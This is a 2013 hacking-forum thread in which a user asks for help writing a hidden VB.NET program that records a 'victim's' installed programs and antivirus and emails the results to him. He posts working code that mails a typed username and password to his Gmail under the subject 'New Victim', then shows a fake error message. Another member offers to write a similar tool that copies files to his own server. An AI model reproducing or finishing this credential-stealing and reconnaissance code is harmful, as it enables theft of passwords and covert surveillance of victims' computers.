RE: Exe that copies all installed programs 04-16-2013, 01:35 PM
#26
(04-16-2013, 01:33 PM)ReTi0n Wrote:(04-16-2013, 12:48 PM)Aut•ono•mous Wrote:(04-12-2013, 07:19 AM)ReTi0n Wrote: Hi guys , I have a single question to ask.
Is there a way to make a vb net program that runs on the background , copies all installed programs into a variable or smthin (I only want to know what antivirus victim has but anyway) and then email all data to me?
From what I said above I have only find on google the code to sent the email:
[/color]Code:[color=#FF0000]Imports System.Net.Mail Public Class Form1 Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles PrimeButton1.Click Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress("email@gmail.com") MyMailMessage.To.Add("email@gmail.com") MyMailMessage.Subject = ("New Victim") MyMailMessage.Body = ("Username: " + TextBox1.Text + " " + "Password: " + TextBox2.Text) Dim SMTPServer As New SmtpClient("smtp.gmail.com") SMTPServer.Port = 587 SMTPServer.Credentials = New System.Net.NetworkCredential("youremail", "youremailpass") SMTPServer.EnableSsl = True SMTPServer.Send(MyMailMessage) MsgBox("Fatal Error! 0x23324 Can not connect to account!", MsgBoxStyle.Critical) End Sub End Class
Can someone help???
I wrote a program in VB a year or so ago very similar to this. What it would do is pull images from "Program Files" & store them on a server of mine. I could re-write it for you if you'd like. You'll just have to get familiar with logos, lol.
May you give a little more detail about your program? It might help me ;D
Well as I said, I'm talking about one I did over a year ago. I don't have it anymore. ):
but it took me like 2 days to make, so I'm sure I could code what you're looking for. (:


![[Image: Free_Logo_autonomous..png]](https://dl.dropboxusercontent.com/u/18833908/Free_Logo_autonomous..png)
![[+]](https://sinister.li/images/modern/collapse_collapsed.png)